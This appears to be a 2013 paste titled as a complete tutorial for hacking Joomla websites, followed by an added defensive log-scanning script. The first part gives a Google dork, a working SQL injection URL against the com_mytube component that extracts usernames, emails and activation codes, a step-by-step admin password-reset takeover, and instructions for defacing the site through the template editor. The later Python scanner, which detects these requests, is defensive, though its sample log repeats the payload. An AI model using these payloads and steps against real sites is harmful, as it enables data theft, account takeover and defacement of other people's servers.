Joomla

By: Fizche on Aug 27th, 2013
HOW TO HACK JOOMLA WEBSITES COMPLETE TUTORIAL
There are different ways to hack a Joomla-based website, but today I am posting
one of the finest ways to hack Joomla websites.
Tutorial to hack Joomla websites
First of all, use this
Google Dork:
inurl:"option=com_mytube"

Enter this dork in the Google search box.

Next is injecting the target.

Look for this URL:
http://site.com/index.php?option=com_mytube&Itemid=88...

Now you have to replace the URL like this:

Code:
http://site.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--

If the site is vulnerable, you will see output like the image shown below:

We can see the username, email and activation code. (username:email:activation code)

Now, leave this page open and open a new page.

3- Admin password reset

Go to:

http://www.site.com/index.php?option=com_user&view=reset

This is the standard Joomla! query for a password reset request.

Type the email address found in step 2 and press Submit.

The activation code should be reset.

Return to the first page, refresh the page and take the new activation code.

Paste it into the token field and press Submit.

problem with token.. :((

UPDATE: Joomla! 1.5.16 now hashes the reset token

If you see something like :$1$14411: after the activation code, it will not work.

4- Admin Login

If you did everything correctly, your Password page will load. Enter your new password...
After that go to:

http://www.site.com/administrator/

Standard Joomla portal content management system

Enter the username (found in step 2) and your new password, then click on Login.
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML

In the Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
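
From the defender's side, both requests this tutorial depends on are visible in web server access logs: a non-integer user_id sent to com_mytube, followed by a visit to the com_user reset view from the same client. The Python sketch below is an added example, not part of the original paste; it assumes combined log format, and the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: client IP, then the request line (other fields skipped).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')

def classify(target):
    """Return 'bad_user_id', 'reset' or None for one request target."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    def last(key):
        return qs.get(key, [None])[-1]
    if last("option") == "com_mytube":
        uid = last("user_id")
        # user_id is a numeric key; any other value is hostile or broken input.
        if uid is not None and not re.fullmatch(r"\d+", uid):
            return "bad_user_id"
    if last("option") == "com_user" and last("view") == "reset":
        return "reset"
    return None

def scan(lines):
    """Return (line_no, ip, finding) tuples for suspicious requests."""
    findings, probed = [], set()
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m["target"])
        if kind == "bad_user_id":
            probed.add(m["ip"])
            findings.append((n, m["ip"], "non-integer user_id to com_mytube"))
        elif kind == "reset" and m["ip"] in probed:
            # Reset requests are normal alone; after a probe they are not.
            findings.append((n, m["ip"], "password reset after com_mytube probe"))
    return findings

# Constructed sample log lines (documentation IP ranges, shortened query).
SAMPLE_LOG = [
    '198.51.100.20 - - [27/Aug/2013:10:00:01 +0000] "GET /index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/Aug/2013:10:02:13 +0000] "GET /index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1 HTTP/1.1" 200 4983',
    '198.51.100.20 - - [27/Aug/2013:10:03:40 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3011',
    '203.0.113.7 - - [27/Aug/2013:10:04:02 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3011',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Detection only shows that the site was probed. The fix is on the server: the component has to treat user_id strictly as an integer before it reaches a query, and the site should run a Joomla! release that hashes the reset token (1.5.16 or later, per the update above).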